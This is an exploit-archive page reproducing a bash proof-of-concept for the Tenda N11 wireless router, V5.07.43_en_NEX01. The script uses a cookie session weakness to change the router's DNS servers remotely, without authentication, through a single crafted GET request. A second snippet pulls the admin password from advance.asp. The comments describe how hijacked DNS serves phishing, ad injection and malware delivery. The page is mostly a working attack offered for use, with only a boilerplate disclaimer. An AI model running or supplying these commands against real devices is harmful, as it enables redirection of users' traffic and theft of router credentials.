首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Tenda N11 Wireless Router 5.07.43_en_NEX01 Remote DNS Changer
来源:https://ethical-hacker.org/ 作者:Donev 发布时间:2018-03-28  

#!/bin/bash
#
#  Tenda N11 Wireless Router V5.07.43_en_NEX01
#  Cookie Session Weakness Remote DNS Change PoC Exploit
#
#  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
https://ethical-hacker.org/
https://facebook.com/ethicalhackerorg
#
#  Once modified, systems use foreign DNS servers,  which are
#  usually set up by cybercriminals. Users with vulnerable
#  systems or devices who try to access certain sites are
#  instead redirected to possibly malicious sites.

#  Modifying systems' DNS settings allows cybercriminals to
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites:
#       These sites can be phishing pages that
#       spoof well-known sites in order to
#       trick users into handing out sensitive
#       information.
#
#    o  Replacing ads on legitimate sites:
#       Visiting certain sites can serve users
#       with infected systems a different set
#       of ads from those whose systems are
#       not infected.
#  
#    o  Controlling and redirecting network traffic:
#       Users of infected systems may not be granted
#       access to download important OS and software
#       updates from vendors like Microsoft and from
#       their respective security vendors.
#
#    o  Pushing additional malware:
#       Infected systems are more prone to other
#       malware infections (e.g., FAKEAV infection).
#
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#  
#  Use them at your own risk!
#
#
 
if [[ $# -gt 3 || $# -lt 2 ]]; then
        echo "        Tenda N11 Wireless Router V5.07.43_en_NEX01 "
        echo "    Cookie Session Weakness Remote DNS Change PoC Exploit"
        echo "  ==========================================================="
        echo "  Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
        echo "  Example: $0 133.7.133.7 8.8.8.8"
        echo "  Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
        echo ""
        echo "  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>"
        echo "  https://ethical-hacker.org/ https://fb.com/ethicalhackerorg"
        exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
        echo "  Error : libwww-perl not found =/"
        exit;
fi
        GET -H "Cookie: admin:language=en; path=/" "http://$1/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=$2&DS2=$3" 2>/dev/null


# Proof Of Concept 2:

# [todor@paladium ~]$ GET "http://133.7.13.37:8080/advance.asp" | grep def_password= | sed 's/def_password=/ Password: /g'
#  Password: "Ethical-Hacker-Bulgaria-2o18";
# [todor@paladium ~]$


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ClipBucket beats_uploader Unau
·TwonkyMedia Server 7.0.11-8.5
·Laravel Log Viewer < 0.13.0 -
·SysGauge 4.5.18 Denial Of Serv
·Fast AVI MPEG Splitter 1.2 - S
·Square 9 GlobalForms 6.2.x Bli
·Easy Avi Divx Xvid to DVD Burn
·Allok AVI DivX MPEG To DVD Con
·Easy CD DVD Copy 1.3.24 - Loca
·Drupal 7.0 < 7.31 - 'Drupalged
·XenForo 2 - CSS Loader Denial
·GitStack - Unsanitized Argumen
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved